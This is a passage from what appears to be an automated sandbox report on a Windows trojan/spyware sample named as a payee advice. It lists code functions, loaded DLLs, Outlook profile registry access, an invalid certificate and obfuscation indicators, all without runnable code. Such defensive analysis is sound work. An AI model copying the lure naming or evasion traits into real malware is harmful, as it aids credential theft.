            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8061204_2_3A806120
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A802F204_2_3A802F20
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A804B404_2_3A804B40
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8019404_2_3A801940
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8003504_2_3A800350
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8067604_2_3A806760
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8035604_2_3A803560
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8003604_2_3A800360
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A811CF04_2_3A811CF0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8184704_2_3A818470
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81FB304_2_3A81FB30
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A810E8B4_2_3A810E8B
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81A0904_2_3A81A090
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81D2904_2_3A81D290
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A810E984_2_3A810E98
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81BCB04_2_3A81BCB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A818AB04_2_3A818AB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81EEB04_2_3A81EEB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81D8D04_2_3A81D8D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81A6D04_2_3A81A6D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A811CE04_2_3A811CE0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81F4F04_2_3A81F4F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8190F04_2_3A8190F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81C2F04_2_3A81C2F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8104F94_2_3A8104F9
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8100074_2_3A810007
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81C6104_2_3A81C610
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8194104_2_3A819410
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81F8104_2_3A81F810
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8118174_2_3A811817
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8118284_2_3A811828
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81B0304_2_3A81B030
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81E2304_2_3A81E230
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81CC414_2_3A81CC41
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8100404_2_3A810040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A819A504_2_3A819A50
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81CC504_2_3A81CC50
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81E8704_2_3A81E870
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81B6704_2_3A81B670
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81B9904_2_3A81B990
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8187904_2_3A818790
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81EB904_2_3A81EB90
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81D5B04_2_3A81D5B0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81A3B04_2_3A81A3B0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8109BF4_2_3A8109BF
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81F1D04_2_3A81F1D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8109D04_2_3A8109D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A818DD04_2_3A818DD0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81BFD04_2_3A81BFD0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8135E84_2_3A8135E8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81DBF04_2_3A81DBF0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81A9F04_2_3A81A9F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8105084_2_3A810508
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81AD104_2_3A81AD10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81DF104_2_3A81DF10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81C9304_2_3A81C930
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8197304_2_3A819730
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8113514_2_3A811351
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81E5504_2_3A81E550
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81B3504_2_3A81B350
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8113604_2_3A811360
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A8133604_2_3A813360
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A819D704_2_3A819D70
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A81CF704_2_3A81CF70
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A991B504_2_3A991B50
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9930084_2_3A993008
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9936F04_2_3A9936F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9914704_2_3A991470
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9929204_2_3A992920
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A990D884_2_3A990D88
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9922384_2_3A992238
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9947B84_2_3A9947B8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A991B3F4_2_3A991B3F
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9936E14_2_3A9936E1
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9914604_2_3A991460
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A990A104_2_3A990A10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9908DE4_2_3A9908DE
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9929114_2_3A992911
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9909604_2_3A990960
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A992FFB4_2_3A992FFB
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A990D7B4_2_3A990D7B
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9922294_2_3A992229
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9900064_2_3A990006
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A9900404_2_3A990040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3B001B144_2_3B001B14
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3B0049584_2_3B004958
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3B00B4504_2_3B00B450
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: String function: 00402B3A appears 47 times
            Source: PayeeAdvice_HK54912_R0038704_37504.exeStatic PE information: invalid certificate
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametipning husnummers.exe< vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3328690059.0000000006F99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3348987225.0000000037377000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametipning husnummers.exe< vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exeBinary or memory string: OriginalFilenametipning husnummers.exe< vs PayeeAdvice_HK54912_R0038704_37504.exe
            Source: PayeeAdvice_HK54912_R0038704_37504.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@6/4
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045CA
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile created: C:\Users\user\AppData\Local\foreslaaendeJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeMutant created: NULL
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile created: C:\Users\user\AppData\Local\Temp\nsg229C.tmpJump to behavior
            Source: PayeeAdvice_HK54912_R0038704_37504.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PayeeAdvice_HK54912_R0038704_37504.exeReversingLabs: Detection: 31%
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile read: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess created: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 5620, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.2666489951.000000000839D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00169C30 push esp; retf 0018h4_2_00169D55
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeFile created: C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
